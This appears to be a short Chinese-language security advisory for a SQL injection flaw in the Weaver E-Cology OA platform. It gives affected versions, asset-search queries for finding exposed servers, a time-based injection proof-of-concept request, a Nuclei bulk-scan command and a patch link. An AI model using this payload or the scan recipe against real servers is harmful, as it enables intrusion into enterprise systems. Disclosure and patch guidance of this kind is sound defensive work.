前言:
泛微协同管理应用平台E-Cology是一套功能丰富的企业协同管理平台,集成了企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理和数据中心等功能。
一、漏洞影响范围:
- Ecology 9.x 补丁版本 < 10.58.0
- Ecology 8.x 补丁版本 < 10.58.0
二、搜索语法:
- app.name=”泛微 E-Cology 9.0 OA”
- app.name=”泛微 E-Cology OA”
三、POC特征:
通过以下请求可触发漏洞:
<code>POST //weaver/weaver.file.FileDownloadForOutDoc fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1</code>
目前漏扫工具Nuclei也公布了相关POC模板:
https://github.com/UltimateSec/ultimaste-nuclei-templates/tree/main/ecology-oa
四、漏洞复现:
使用Nuclei进行扫描:
<code>nuclei -t .\pocs\ecology-oa-filedownloadforoutdoc-sqli.yaml -l .\ip.txt -o vulns.txt</code>
五、修复方式:
官方已发布安全补丁,建议受影响用户尽快升级至10.58及以上版本。
https://www.weaver.com.cn/cs/securityDownload.asp
© 版权声明
THE END
暂无评论内容